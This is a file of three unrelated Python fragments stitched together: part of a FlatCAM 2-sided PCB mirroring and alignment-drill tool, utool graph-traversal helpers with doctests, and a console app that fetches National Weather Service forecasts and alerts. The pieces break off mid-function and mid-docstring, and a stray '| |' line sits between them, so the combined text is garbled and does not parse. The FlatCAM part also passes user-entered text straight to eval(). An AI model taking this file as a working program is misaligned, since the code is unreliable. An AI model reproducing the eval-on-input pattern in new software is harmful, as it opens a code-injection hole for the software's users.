self.ui.mirror_axis.set_value(self.app.defaults["tools_2sided_mirror_axis"])
self.ui.axis_location.set_value(self.app.defaults["tools_2sided_axis_loc"])
self.ui.drill_dia.set_value(self.app.defaults["tools_2sided_drilldia"])
self.ui.align_axis_radio.set_value(self.app.defaults["tools_2sided_allign_axis"])
self.ui.xmin_entry.set_value(0.0)
self.ui.ymin_entry.set_value(0.0)
self.ui.xmax_entry.set_value(0.0)
self.ui.ymax_entry.set_value(0.0)
self.ui.center_entry.set_value('')
self.ui.align_ref_label_val.set_value('%.*f' % (self.decimals, 0.0))
# run once to make sure that the obj_type attribute is updated in the FCComboBox
self.ui.object_type_radio.set_value('grb')
self.on_object_type('grb')
self.ui.box_type_radio.set_value('grb')
self.on_combo_box_type('grb')
if self.local_connected is True:
self.disconnect_events()
def on_object_type(self, val):
obj_type = {'grb': 0, 'exc': 1, 'geo': 2}[val]
self.ui.object_combo.setRootModelIndex(self.app.collection.index(obj_type, 0, QtCore.QModelIndex()))
self.ui.object_combo.setCurrentIndex(0)
self.ui.object_combo.obj_type = {
"grb": "Gerber", "exc": "Excellon", "geo": "Geometry"}[val]
def on_combo_box_type(self, val):
obj_type = {'grb': 0, 'exc': 1, 'geo': 2}[val]
self.ui.box_combo.setRootModelIndex(self.app.collection.index(obj_type, 0, QtCore.QModelIndex()))
self.ui.box_combo.setCurrentIndex(0)
self.ui.box_combo.obj_type = {
"grb": "Gerber", "exc": "Excellon", "geo": "Geometry"}[val]
def on_create_alignment_holes(self):
axis = self.ui.align_axis_radio.get_value()
mode = self.ui.axis_location.get_value()
if mode == "point":
try:
px, py = self.ui.point_entry.get_value()
except TypeError:
msg = '[WARNING_NOTCL] %s' % \
_("'Point' reference is selected and 'Point' coordinates are missing. Add them and retry.")
self.app.inform.emit(msg)
return
else:
selection_index = self.ui.box_combo.currentIndex()
model_index = self.app.collection.index(selection_index, 0, self.ui.object_combo.rootModelIndex())
try:
bb_obj = model_index.internalPointer().obj
except AttributeError:
msg = '[WARNING_NOTCL] %s' % _("There is no Box reference object loaded. Load one and retry.")
self.app.inform.emit(msg)
return
xmin, ymin, xmax, ymax = bb_obj.bounds()
px = 0.5 * (xmin + xmax)
py = 0.5 * (ymin + ymax)
xscale, yscale = {"X": (1.0, -1.0), "Y": (-1.0, 1.0)}[axis]
dia = self.ui.drill_dia.get_value()
if dia == '':
msg = '[WARNING_NOTCL] %s' % _("No value or wrong format in Drill Dia entry. Add it and retry.")
self.app.inform.emit(msg)
return
tools = {1: {}}
tools[1]["tooldia"] = dia
tools[1]['drills'] = []
tools[1]['solid_geometry'] = []
# holes = self.alignment_holes.get_value()
holes = eval('[{}]'.format(self.ui.alignment_holes.text()))
if not holes:
msg = '[WARNING_NOTCL] %s' % _("There are no Alignment Drill Coordinates to use. Add them and retry.")
self.app.inform.emit(msg)
return
for hole in holes:
point = Point(hole)
point_mirror = affinity.scale(point, xscale, yscale, origin=(px, py))
tools[1]['drills'] += [point, point_mirror]
tools[1]['solid_geometry'] += [point, point_mirror]
def obj_init(obj_inst, app_inst):
obj_inst.tools = tools
obj_inst.create_geometry()
obj_inst.source_file = app_inst.f_handlers.export_excellon(obj_name=obj_inst.options['name'],
local_use=obj_inst,
filename=None,
use_thread=False)
ret_val = self.app.app_obj.new_object("excellon", _("Alignment Drills"), obj_init)
self.drill_values = ''
if not ret_val == 'fail':
self.app.inform.emit('[success] %s' % _("Excellon object with alignment drills created..."))
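# A minimal standalone sketch (not FlatCAM code) of the mirroring used above:
# shapely's affinity.scale with a negative factor reflects a geometry about the
# axis passing through the given origin. The coordinates below are hypothetical.
#
#   from shapely import affinity
#   from shapely.geometry import Point
#   px, py = 10.0, 0.0                        # mirror axis location
#   hole = Point(12.5, 3.0)
#   mirrored = affinity.scale(hole, xfact=-1.0, yfact=1.0, origin=(px, py))
#   print(mirrored)                           # POINT (7.5 3), reflected about x = 10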
def on_pick_hole(self):
# get the Excellon file whose geometry will contain the desired drill hole
selection_index = self.ui.exc_combo.currentIndex()
model_index = self.app.collection.index(selection_index, 0, self.ui.exc_combo.rootModelIndex())
try:
self.exc_hole_obj = model_index.internalPointer().obj
except Exception:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("There is no Excellon object loaded ..."))
return
# disengage the grid snapping since it will be hard to find the drills or pads on grid
if self.app.ui.grid_snap_btn.isChecked():
self.grid_status_memory = True
self.app.ui.grid_snap_btn.trigger()
else:
self.grid_status_memory = False
self.local_connected = True
self.app.inform.emit('%s.' % _("Click on canvas within the desired Excellon drill hole"))
self.mr = self.canvas.graph_event_connect('mouse_release', self.on_mouse_click_release)
if self.app.is_legacy is False:
self.canvas.graph_event_disconnect('mouse_release', self.app.on_mouse_click_release_over_plot)
else:
self.canvas.graph_event_disconnect(self.app.mr)
def on_mouse_click_release(self, event):
if self.app.is_legacy is False:
event_pos = event.pos
right_button = 2
self.app.event_is_dragging = self.app.event_is_dragging
else:
event_pos = (event.xdata, event.ydata)
right_button = 3
self.app.event_is_dragging = self.app.ui.popMenu.mouse_is_panning
pos_canvas = self.canvas.translate_coords(event_pos)
if event.button == 1:
click_pt = Point([pos_canvas[0], pos_canvas[1]])
if self.app.selection_type is not None:
# delete previous selection shape
self.app.delete_selection_shape()
self.app.selection_type = None
else:
if self.exc_hole_obj.kind.lower() == 'excellon':
for tool, tool_dict in self.exc_hole_obj.tools.items():
for geo in tool_dict['solid_geometry']:
if click_pt.within(geo):
center_pt = geo.centroid
center_pt_coords = (
self.app.dec_format(center_pt.x, self.decimals),
self.app.dec_format(center_pt.y, self.decimals)
)
self.app.delete_selection_shape()
self.ui.axis_location.set_value('point')
# set the reference point for mirror
self.ui.point_entry.set_value(center_pt_coords)
self.app.inform.emit('[success] %s' % _("Mirror reference point set."))
elif event.button == right_button and self.app.event_is_dragging is False:
self.app.delete_selection_shape()
self.disconnect_events()
self.app.inform.emit('[WARNING_NOTCL] %s' % _("Cancelled by user request."))
def disconnect_events(self):
self.app.mr = self.canvas.graph_event_connect('mouse_release', self.app.on_mouse_click_release_over_plot)
if self.app.is_legacy is False:
self.canvas.graph_event_disconnect('mouse_release', self.on_mouse_click_release)
else:
self.canvas.graph_event_disconnect(self.mr)
self.local_connected = False
def on_mirror(self):
selection_index = self.ui.object_combo.currentIndex()
# fcobj = self.app.collection.object_list[selection_index]
model_index = self.app.collection.index(selection_index, 0, self.ui.object_combo.rootModelIndex())
try:
fcobj = model_index.internalPointer().obj
except Exception:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("There is no Gerber object loaded ..."))
return
if fcobj.kind not in ['gerber', 'geometry', 'excellon']:
self.app.inform.emit('[ERROR_NOTCL] %s' % _("Only Gerber, Excellon and Geometry objects can be mirrored."))
return
axis = self.ui.mirror_axis.get_value()
mode = self.ui.axis_location.get_value()
if mode == "box":
selection_index_box = self.ui.box_combo.currentIndex()
model_index_box = self.app.collection.index(selection_index_box, 0, self.ui.box_combo.rootModelIndex())
try:
bb_obj = model_index_box.internalPointer().obj
except Exception:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("There is no Box object loaded ..."))
return
xmin, ymin, xmax, ymax = bb_obj.bounds()
px = 0.5 * (xmin + xmax)
py = 0.5 * (ymin + ymax)
else:
try:
px, py = self.ui.point_entry.get_value()
except TypeError:
self.app.inform.emit('[WARNING_NOTCL] %s' % _("There are no Point coordinates in the Point field. "
"Add coords and try again ..."))
return
fcobj.mirror(axis, [px, py])
self.app.app_obj.object_changed.emit(fcobj)
fcobj.plot()
self.app.inform.emit('[success] %s: %s' % (_("Object was mirrored"), str(fcobj.options['name'])))
def on_point_add(self):
val = self.app.defaults["global_point_clipboard_format"] % \
(self.decimals, self.app.pos[0], self.decimals, self.app.pos[1])
self.ui.point_entry.set_value(val)
def on_drill_add(self):
self.drill_values += (self.app.defaults["global_point_clipboard_format"] %
(self.decimals, self.app.pos[0], self.decimals, self.app.pos[1])) + ','
self.ui.alignment_holes.set_value(self.drill_values)
def on_drill_delete_last(self):
# Drop the last "(x, y)," coordinate pair from the accumulated string
drill_values_without_last_tuple = self.drill_values.rpartition('(')[0]
self.drill_values = drill_values_without_last_tuple
self.ui.alignment_holes.set_value(self.drill_values)
def on_toggle_pointbox(self):
val = self.ui.axis_location.get_value()
if val == "point":
self.ui.point_entry.show()
self.ui.add_point_button.show()
self.ui.box_type_label.hide()
self.ui.box_type_radio.hide()
self.ui.box_combo.hide()
self.ui.exc_hole_lbl.hide()
self.ui.exc_combo.hide()
self.ui.pick_hole_button.hide()
self.ui.align_ref_label_val.set_value(self.ui.point_entry.get_value())
elif val == 'box':
self.ui.point_entry.hide()
self.ui.add_point_button.hide()
self.ui.box_type_label.show()
self.ui.box_type_radio.show()
self.ui.box_combo.show()
self.ui.exc_hole_lbl.hide()
self.ui.exc_combo.hide()
self.ui.pick_hole_button.hide()
self.ui.align_ref_label_val.set_value("Box centroid")
elif val == 'hole':
self.ui.point_entry.show()
self.ui.add_point_button.hide()
self.ui.box_type_label.hide()
self.ui.box_type_radio.hide()
self.ui.box_combo.hide()
self.ui.exc_hole_lbl.show()
self.ui.exc_combo.show()
self.ui.pick_hole_button.show()
def on_bbox_coordinates(self):
xmin = Inf
ymin = Inf
xmax = -Inf
ymax = -Inf
obj_list = self.app.collection.get_selected()
if not obj_list:
self.app.inform.emit('[ERROR_NOTCL] %s %s' % (_("Failed."), _("No object is selected.")))
return
for obj in obj_list:
try:
gxmin, gymin, gxmax, gymax = obj.bounds()
xmin = min([xmin, gxmin])
ymin = min([ymin, gymin])
xmax = max([xmax, gxmax])
ymax = max([ymax, gymax])
except Exception as e:
log.warning("DEV WARNING: Tried to get bounds of empty geometry in DblSidedTool. %s" % str(e))
self.ui.xmin_entry.set_value(xmin)
self.ui.ymin_entry.set_value(ymin)
self.ui.xmax_entry.set_value(xmax)
self.ui.ymax_entry.set_value(ymax)
cx = '%.*f' % (self.decimals, (((xmax - xmin) / 2.0) + xmin))
cy = '%.*f' % (self.decimals, (((ymax - ymin) / 2.0) + ymin))
val_txt = '(%s, %s)' % (cx, cy)
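# e.g. with decimals = 4 and bounds (0, 0, 100, 80) -> val_txt = '(50.0000, 40.0000)'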
self.ui.center_entry.set_value(val_txt)
self.ui.axis_location.set_value('point')
self.ui.point_entry.set_value(val_txt)
self.app.delete_selection_shape()
def on_xmin_clicked(self):
xmin = self.ui.xmin_entry.get_value()
self.ui.axis_location.set_value('point')
try:
px, py = self.ui.point_entry.get_value()
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, xmin, self.decimals, py)
except TypeError:
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, xmin, self.decimals, 0.0)
self.ui.point_entry.set_value(val)
def on_ymin_clicked(self):
ymin = self.ui.ymin_entry.get_value()
self.ui.axis_location.set_value('point')
try:
px, py = self.ui.point_entry.get_value()
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, px, self.decimals, ymin)
except TypeError:
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, 0.0, self.decimals, ymin)
self.ui.point_entry.set_value(val)
def on_xmax_clicked(self):
xmax = self.ui.xmax_entry.get_value()
self.ui.axis_location.set_value('point')
try:
px, py = self.ui.point_entry.get_value()
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, xmax, self.decimals, py)
except TypeError:
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, xmax, self.decimals, 0.0)
self.ui.point_entry.set_value(val)
def on_ymax_clicked(self):
ymax = self.ui.ymax_entry.get_value()
self.ui.axis_location.set_value('point')
try:
px, py = self.ui.point_entry.get_value()
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, px, self.decimals, ymax)
except TypeError:
val = self.app.defaults["global_point_clipboard_format"] % (self.decimals, 0.0, self.decimals, ymax)
self.ui.point_entry.set_value(val)
def reset_fields(self):
self.ui.object_combo.setRootModelIndex(self.app.collection.index(0, 0, QtCore.QModelIndex()))
self.ui.box_combo.setRootModelIndex(self.app.collection.index(0, 0, QtCore.QModelIndex()))
self.ui.object_combo.setCurrentIndex(0)
self.ui.box_combo.setCurrentIndex(0)
self.ui.box_type_radio.set_value('grb')
self.drill_values = ""
self.ui.align_ref_label_val.set_value('')
class DsidedUI:
toolName = _("2-Sided PCB")
def __init__(self, layout, app):
self.app = app
self.decimals = self.app.decimals
self.layout = layout
# ## Title
title_label = FCLabel("%s" % self.toolName)
title_label.setStyleSheet("""
| |
{
'fgweight': None,
},
},
}
"""
# Hacky but illustrative
# TODO: implement non-hacky version
allkeys = get_allkeys(dict_)
mat = np.zeros((len(allkeys), len(allkeys)))
for key in allkeys:
if key != root:
for parent in child_to_parents[key]:
rx = allkeys.index(parent)
cx = allkeys.index(key)
mat[rx][cx] = 1
end = None
seen_ = set([])
reversed_ = {root: traverse_path(root, end, seen_, allkeys, mat)}
return reversed_
def get_levels(dict_, n=0, levels=None):
r"""
DEPRECATED
Args:
dict_ (dict_): a dictionary
n (int): (default = 0)
levels (None): (default = None)
CommandLine:
python -m utool.util_graph --test-get_levels --show
python3 -m utool.util_graph --test-get_levels --show
Example:
>>> # DISABLE_DOCTEST
>>> from utool.util_graph import * # NOQA
>>> import utool as ut
>>> from_root = {
>>> 'dummy_annot': {
>>> 'chip': {
>>> 'keypoint': {
>>> 'fgweight': None,
>>> },
>>> },
>>> 'probchip': {
>>> 'fgweight': None,
>>> },
>>> },
>>> }
>>> dict_ = from_root
>>> n = 0
>>> levels = None
>>> levels_ = get_levels(dict_, n, levels)
>>> result = ut.repr2(levels_, nl=1)
>>> print(result)
[
['dummy_annot'],
['chip', 'probchip'],
['keypoint', 'fgweight'],
['fgweight'],
]
"""
if levels is None:
levels_ = [[] for _ in range(dict_depth(dict_))]
else:
levels_ = levels
if dict_ is None:
return []
for key in dict_.keys():
levels_[n].append(key)
for val in dict_.values():
get_levels(val, n + 1, levels_)
return levels_
def longest_levels(levels_):
r"""
Args:
levels_ (list):
CommandLine:
python -m utool.util_graph --exec-longest_levels --show
Example:
>>> # ENABLE_DOCTEST
>>> from utool.util_graph import * # NOQA
>>> import utool as ut
>>> levels_ = [
>>> ['dummy_annot'],
>>> ['chip', 'probchip'],
>>> ['keypoint', 'fgweight'],
>>> ['fgweight'],
>>> ]
>>> new_levels = longest_levels(levels_)
>>> result = ('new_levels = %s' % (ut.repr2(new_levels, nl=1),))
>>> print(result)
new_levels = [
['dummy_annot'],
['chip', 'probchip'],
['keypoint'],
['fgweight'],
]
"""
return shortest_levels(levels_[::-1])[::-1]
# seen_ = set([])
# new_levels = []
# for level in levels_[::-1]:
# new_level = [item for item in level if item not in seen_]
# seen_ = seen_.union(set(new_level))
# new_levels.append(new_level)
# new_levels = new_levels[::-1]
# return new_levels
def shortest_levels(levels_):
r"""
Args:
levels_ (list):
CommandLine:
python -m utool.util_graph --exec-shortest_levels --show
Example:
>>> # ENABLE_DOCTEST
>>> from utool.util_graph import * # NOQA
>>> import utool as ut
>>> levels_ = [
>>> ['dummy_annot'],
>>> ['chip', 'probchip'],
>>> ['keypoint', 'fgweight'],
>>> ['fgweight'],
>>> ]
>>> new_levels = shortest_levels(levels_)
>>> result = ('new_levels = %s' % (ut.repr2(new_levels, nl=1),))
>>> print(result)
new_levels = [
['dummy_annot'],
['chip', 'probchip'],
['keypoint', 'fgweight'],
]
"""
seen_ = set([])
new_levels = []
for level in levels_:
new_level = [item for item in level if item not in seen_]
seen_ = seen_.union(set(new_level))
if len(new_level) > 0:
new_levels.append(new_level)
new_levels = new_levels
return new_levels
def simplify_graph(graph):
"""
strips out everything but connectivity
Args:
graph (nx.Graph):
Returns:
nx.Graph: new_graph
CommandLine:
python3 -m utool.util_graph simplify_graph --show
python2 -m utool.util_graph simplify_graph --show
python2 -c "import networkx as nx; print(nx.__version__)"
python3 -c "import networkx as nx; print(nx.__version__)"
Ignore:
>>> # ENABLE_DOCTEST
>>> from utool.util_graph import * # NOQA
>>> import utool as ut
>>> graph = nx.DiGraph([('a', 'b'), ('a', 'c'), ('a', 'e'),
>>> ('a', 'd'), ('b', 'd'), ('c', 'e'),
>>> ('d', 'e'), ('c', 'e'), ('c', 'd')])
>>> new_graph = simplify_graph(graph)
>>> result = ut.repr2(list(new_graph.edges()))
>>> #adj_list = sorted(list(nx.generate_adjlist(new_graph)))
>>> #result = ut.repr2(adj_list)
>>> print(result)
[(0, 1), (0, 2), (0, 3), (0, 4), (1, 3), (2, 3), (2, 4), (3, 4)]
['0 1 2 3 4', '1 3 4', '2 4', '3', '4 3']
"""
import utool as ut
nodes = sorted(list(graph.nodes()))
node_lookup = ut.make_index_lookup(nodes)
if graph.is_multigraph():
edges = list(graph.edges(keys=True))
else:
edges = list(graph.edges())
new_nodes = ut.take(node_lookup, nodes)
if graph.is_multigraph():
new_edges = [(node_lookup[e[0]], node_lookup[e[1]], e[2], {}) for e in edges]
else:
new_edges = [(node_lookup[e[0]], node_lookup[e[1]]) for e in edges]
cls = graph.__class__
new_graph = cls()
new_graph.add_nodes_from(new_nodes)
new_graph.add_edges_from(new_edges)
return new_graph
def subgraph_from_edges(G, edge_list, ref_back=True):
"""
Creates a networkx graph that is a subgraph of G
defined by the list of edges in edge_list.
Requires G to be a networkx MultiGraph or MultiDiGraph
edge_list is a list of edges in either (u,v) or (u,v,d) form
where u and v are nodes comprising an edge,
and d would be a dictionary of edge attributes
ref_back determines whether the created subgraph refers to back
to the original graph and therefore changes to the subgraph's
attributes also affect the original graph, or if it is to create a
new copy of the original graph.
References:
http://stackoverflow.com/questions/16150557/nx-subgraph-from-edges
"""
# TODO: support multi-di-graph
sub_nodes = list({y for x in edge_list for y in x[0:2]})
#edge_list_no_data = [edge[0:2] for edge in edge_list]
multi_edge_list = [edge[0:3] for edge in edge_list]
if ref_back:
G_sub = G.subgraph(sub_nodes)
for edge in G_sub.edges(keys=True):
if edge not in multi_edge_list:
G_sub.remove_edge(*edge)
else:
G_sub = G.subgraph(sub_nodes).copy()
for edge in G_sub.edges(keys=True):
if edge not in multi_edge_list:
G_sub.remove_edge(*edge)
return G_sub
def nx_node_dict(G):
if nx.__version__.startswith('1'):
return getattr(G, 'node')
else:
return G.nodes
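# Illustrative use of the version shim above (assumes networkx is installed);
# node-attribute access then works on both networkx 1.x and 2.x:
#   G = nx.Graph()
#   G.add_node('a', color='red')
#   nx_node_dict(G)['a']['color']   # -> 'red' under either major version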
def all_multi_paths(graph, source, target, data=False):
r"""
Returns specific paths along multi-edges from the source to this table.
Multipaths are identified by edge keys.
Returns all paths from source to target. This function treats multi-edges
as distinct and returns the key value in each edge tuple that defines a
path.
Example:
>>> # DISABLE_DOCTEST
>>> from dtool.depcache_control import * # NOQA
>>> from utool.util_graph import * # NOQA
>>> from dtool.example_depcache import testdata_depc
>>> depc = testdata_depc()
>>> graph = depc.graph
>>> source = depc.root
>>> target = 'notchpair'
>>> path_list1 = ut.all_multi_paths(graph, depc.root, 'notchpair')
>>> path_list2 = ut.all_multi_paths(graph, depc.root, 'spam')
>>> result1 = ('path_list1 = %s' % ut.repr3(path_list1, nl=1))
>>> result2 = ('path_list2 = %s' % ut.repr3(path_list2, nl=2))
>>> result = '\n'.join([result1, result2])
>>> print(result)
path_list1 = [
[('dummy_annot', 'notch', 0), ('notch', 'notchpair', 0)],
[('dummy_annot', 'notch', 0), ('notch', 'notchpair', 1)],
]
path_list2 = [
[
('dummy_annot', 'chip', 0),
('chip', 'keypoint', 0),
('keypoint', 'fgweight', 0),
('fgweight', 'spam', 0),
],
[
('dummy_annot', 'chip', 0),
('chip', 'keypoint', 0),
('keypoint', 'spam', 0),
],
[
('dummy_annot', 'chip', 0),
('chip', 'spam', 0),
],
[
('dummy_annot', 'probchip', 0),
('probchip', 'fgweight', 0),
('fgweight', 'spam', 0),
],
]
"""
path_multiedges = list(nx_all_simple_edge_paths(graph, source, target,
keys=True, data=data))
return path_multiedges
def reverse_path_edges(edge_list):
return [(edge[1], edge[0],) + tuple(edge[2:]) for edge in edge_list][::-1]
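# Example: reverse_path_edges([('a', 'b', 0), ('b', 'c', 1)])
#   -> [('c', 'b', 1), ('b', 'a', 0)]   (each edge flipped, order reversed)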
def bfs_multi_edges(G, source, reverse=False, keys=True, data=False):
"""Produce edges in a breadth-first-search starting at source.
-----
Based on http://www.ics.uci.edu/~eppstein/PADS/BFS.py
by <NAME>, July 2004.
"""
from collections import deque
from functools import partial
if reverse:
G = G.reverse()
edges_iter = partial(G.edges_iter, keys=keys, data=data)
# list(G.edges_iter('multitest', keys=True, data=True))  # stray debug call; would fail on graphs without a 'multitest' node
visited_nodes = set([source])
# visited_edges = set([])
queue = deque([(source, edges_iter(source))])
while queue:
parent, edges = queue[0]
try:
edge = next(edges)
edge_nodata = edge[0:3]
# if edge_nodata not in visited_edges:
yield edge
# visited_edges.add(edge_nodata)
child = edge_nodata[1]
if child not in visited_nodes:
visited_nodes.add(child)
queue.append((child, edges_iter(child)))
except StopIteration:
queue.popleft()
def dfs_conditional(G, source, state, can_cross):
"""
Example:
>>> # ENABLE_DOCTEST
>>> from utool.util_graph import *
>>> G = nx.Graph()
>>> G.add_edges_from([(1, 2), (2, 3), (3, 4), (4, 5)])
>>> G.adj[2][3]['lava'] = True
>>> G.adj[3][4]['lava'] = True
>>> def can_cross(G, edge, state):
>>> # can only cross lava once, then your lava protection wears off
>>> data = G.get_edge_data(*edge)
>>> lava = int(data.get('lava', False))
>>> if not lava or state == 0:
>>> return True, state + lava
>>> return False, lava
>>> assert 5 not in dfs_conditional(G, 1, state=0, can_cross=can_cross)
>>> G.adj[3][4]['lava'] = False
>>> assert 5 in dfs_conditional(G, 1, state=0, can_cross=can_cross)
"""
# stack based version
visited = {source}
stack = [(source, iter(G[source]), state)]
while stack:
parent, children, state = stack[-1]
try:
child = next(children)
if child not in visited:
edge = (parent, child)
flag, new_state = can_cross(G, edge, state)
if flag:
yield child
visited.add(child)
stack.append((child, iter(G[child]), new_state))
except StopIteration:
stack.pop()
def bfs_conditional(G, source, reverse=False, keys=True, data=False,
yield_nodes=True, yield_if=None,
continue_if=None, visited_nodes=None,
yield_source=False):
"""
Produce edges in a breadth-first-search starting at source, but only return
nodes that satisfiy a condition, and only iterate past a node if it
satisfies a different condition.
conditions are callables that take (G, child, edge) and return true or false
CommandLine:
python -m utool.util_graph bfs_conditional
Example:
"""
Name: one_call_class.py
Author:
Created:
Purpose: OOP console app
Get lat and lon from Openweather map current weather
Use lat and lon for One Call Weather
"""
import requests
import textwrap
import os # Clear the console
import weather_utils
# Import geocode_geopy module for reverse geocode
import geocode_geopy
from datetime import datetime
from time import sleep
class WeatherClass:
def __init__(self):
""" Initialize object """
self.clear_console()
print(weather_utils.title("Welcome to Bill's NWS Weather App!"))
self.__decorator_width = 75
#--------------------------------- GET LOCATION -------------------------------------#
def get_location(self):
"""
Get weather location and weather information
"""
PAUSE = 1
try:
# Get location input from user
city = input("Enter city: ")
state = input("Enter state: ")
country = input("Enter country: ")
# Get location input from user
lat, lng, self.__address = geocode_geopy.geocode(city, state, country)
print(self.__address)
# Get the gridpoints from lat and lng
points_url = weather_utils.NWS_ENDPOINT + "/points/" + \
str(lat) + "," + str(lng)
# Get the gridpoints response
response = requests.get(points_url, timeout=1)
# Get gridpoints dictionary
if(response.status_code == 200):
print("[+] The connection to the National Weather Service was successful.")
# Get the gridpoints dictionary
grid_points_dict = response.json()
# \r return to the beginning of the line before printing
# , end="" Print on the same line
print(f"\r[+] Loading weather data [## ]", end="")
# Get the forecast url from the gridpoints dictionary
forecast_url = grid_points_dict.get("properties").get("forecast")
# station_url = grid_points.get("properties").get("observationStations")
response = requests.get(forecast_url, timeout=1)
sleep(PAUSE)
else:
print("[-] Did not get NWS Gridpoints")
# Get 7 day forecast dictionary
if(response.status_code == 200):
# Get forecast dictionary
forecast_dict = response.json()
print(f"\r[+] Loading weather data [#### ]", end="")
self.forecast_list = forecast_dict.get("properties").get("periods")
# Get observation station URL
forecast_hourly_url = grid_points_dict.get(
"properties").get("forecastHourly")
response = requests.get(forecast_hourly_url, timeout=1)
sleep(PAUSE)
else:
print(
f"[-] Did not get NWS 7 Day Forecast - Response: {response.status_code}")
# Get hourly forecast
if(response.status_code == 200):
# Get forecast dictionary
forecast_hourly_dict = response.json()
print(f"\r[+] Loading weather data [###### ]", end="")
self.forecast_hourly_list = forecast_hourly_dict.get(
"properties").get("periods")
# Get observation station URL
stations_url = grid_points_dict.get(
"properties").get("observationStations")
response = requests.get(stations_url, timeout=1)
sleep(PAUSE)
else:
print(
f"[-] Did not get NWS Hourly Forecast - Response: {response.status_code}")
# Get observation station ids
if(response.status_code == 200):
# Get station dictionary
self.station_dict = response.json()
print(f"\r[+] Loading weather data [######## ]", end="")
# Get first station id in list
self.station_id = self.station_dict.get("features")[0].get(
"properties").get("stationIdentifier")
observations_url = weather_utils.NWS_ENDPOINT + \
"stations/" + self.station_id + "/observations/latest"
response = requests.get(observations_url, timeout=1)
sleep(PAUSE)
else:
print(
f"[-] Did not get Station ID - - Response: {response.status_code}")
# Get latest observation from station
if(response.status_code == 200):
# Get latest observation dictionary
self.weather_dict = response.json()
print(f"\r[+] Loading weather data [########## ]", end="")
sleep(PAUSE)
else:
print(
f"[-] Did not get NWS latest weather observation - Response: {response.status_code}")
# Get weather alerts for the area
if(response.status_code == 200):
alerts_url = f"https://api.weather.gov/alerts?point={lat},{lng}"
response = requests.get(alerts_url)
print(f"\r[+] Loading weather data [############ ]", end="")
self.alert_dict = response.json()
sleep(PAUSE)
active_alerts_url = f"https://api.weather.gov/alerts/active?point={lat},{lng}"
response = requests.get(active_alerts_url, timeout=1)
print(f"\r[+] Loading weather data [##############]")
self.active_alert_dict = response.json()
sleep(PAUSE)
else:
print(
f"[-] Did not get NWS Weather Alerts - Response: {response.status_code}")
except Exception as e:
print("Something went wrong. Let's try again")
print(e)
self.get_location()
# raise exception is used to troubleshoot
# It raises the exception that was handled
# raise exception
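# Minimal standalone sketch of the request chain used above (endpoints as seen
# in this file; the coordinates are hypothetical):
#   import requests
#   points = requests.get("https://api.weather.gov/points/44.98,-93.26").json()
#   forecast_url = points.get("properties").get("forecast")
#   periods = requests.get(forecast_url).json().get("properties").get("periods")
#   print(periods[0].get("shortForecast"))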
#-------------------------- GET ACTIVE WEATHER ALERTS ----------------------------#
def get_active_weather_alerts(self):
""" Get weather alerts """
print("="*self.__decorator_width)
print(f"National Weather Service Active Weather Alerts")
print(f"{self.__address}")
print("="*self.__decorator_width)
# print(self.alert_dict.get("features")[0].get("properties").get("areaDesc"))
active_alert_list = self.active_alert_dict.get("features")[:]
# If active weather alert list is not empty
if active_alert_list != []:
for alert in active_alert_list:
area = alert.get("properties").get("areaDesc")
headline = alert.get("properties").get("headline")
description = alert.get("properties").get("description")
effective = alert.get("properties").get("effective")
effective = datetime.fromisoformat(effective)
effective = effective.strftime(
"%m/%d/%Y, %I:%M %p") # , %-I:%M %p
expires = alert.get("properties").get("expires")
expires = datetime.fromisoformat(expires)
expires = expires.strftime("%m/%d/%Y, %I:%M %p") # , %-I:%M %p
wrapper = textwrap.TextWrapper(width=70)
area = wrapper.fill(text=area)
headline = wrapper.fill(text=headline)
description = wrapper.fill(text=description)
print("*" * 70)
print(f"Effective: {effective}")
print(f"Expires: {expires}")
print(f"{area}")
print(f"{headline}")
print(f"{description}")
input("Press the enter key for the next alert")
else:
print("No active weather alerts at this time.")
#-------------------------- GET WEATHER ALERTS ----------------------------#
def get_weather_alerts(self):
""" Get weather alerts """
print("="*self.__decorator_width)
print(f"National Weather Service Weather Alerts")
print(f"{self.__address}")
print("="*self.__decorator_width)
# print(self.alert_dict.get("features")[0].get("properties").get("areaDesc"))
alert_list = self.alert_dict.get("features")[:]
# If weather alert list is not empty
if alert_list != []:
for alert in alert_list:
area = alert.get("properties").get("areaDesc")
headline = alert.get("properties").get("headline")
description = alert.get("properties").get("description")
effective = alert.get("properties").get("effective")
effective = datetime.fromisoformat(effective)
effective = effective.strftime(
"%m/%d/%Y, %I:%M %p") # , %-I:%M %p
expires = alert.get("properties").get("expires")
expires = datetime.fromisoformat(expires)
expires = expires.strftime("%m/%d/%Y, %I:%M %p") # , %-I:%M %p
wrapper = textwrap.TextWrapper(width=70)
area = wrapper.fill(text=area)
headline = wrapper.fill(text=headline)
description = wrapper.fill(text=description)
print("*" * 70)
print(f"Effective: {effective}")
print(f"Expires: {expires}")
print(f"{area}")
print(f"{headline}")
print(f"{description}")
input("Press the enter key for the next alert")
else:
print("No weather alerts at this time.")
#-------------------------- GET 12 HOUR FORECAST ----------------------------#
def get_twelve_hour_forecast(self):
""" Get hourly forecast """
print("="*self.__decorator_width)
print(
f"National Weather Service 12 Hour Weather Forecast")
print(f"{self.__address}")
print("="*self.__decorator_width)
# Slice 12 hours out of the hourly forecast list
hourly_slice = self.forecast_hourly_list[:12]
# Iterate through each item in the forecast list
for forecast_item in hourly_slice:
start_time = forecast_item.get("startTime")
temperature = forecast_item.get("temperature")
wind_speed = forecast_item.get("windSpeed")
wind_direction = forecast_item.get("windDirection")
short_forecast = forecast_item.get("shortForecast")
time = datetime.fromisoformat(start_time)
time = time.strftime('%I:%M %p')
print(
f"{time:>8}: {temperature:>5.1f}°F | {wind_speed:>8} | {wind_direction:>5} | {short_forecast}")
#-------------------------- GET LATEST WEATHER OBSERVATION ----------------------------#
def get_weather(self):
""" Get latest observation from the closest NWS station """
# Get nearest stationid
self.station_name = self.station_dict.get(
"features")[0].get("properties").get("name")
# Get latest weather observation from dictionary
# Shorten up weather observations dictionary code
weather_obs = self.weather_dict.get("properties")
timestamp = weather_obs.get("timestamp")
timestamp = datetime.fromisoformat(timestamp)
self.__timestamp = timestamp.strftime("%m/%d/%Y, %I:%M %p")
self.__description = weather_obs.get("textDescription")
temperature = weather_obs.get("temperature").get("value")
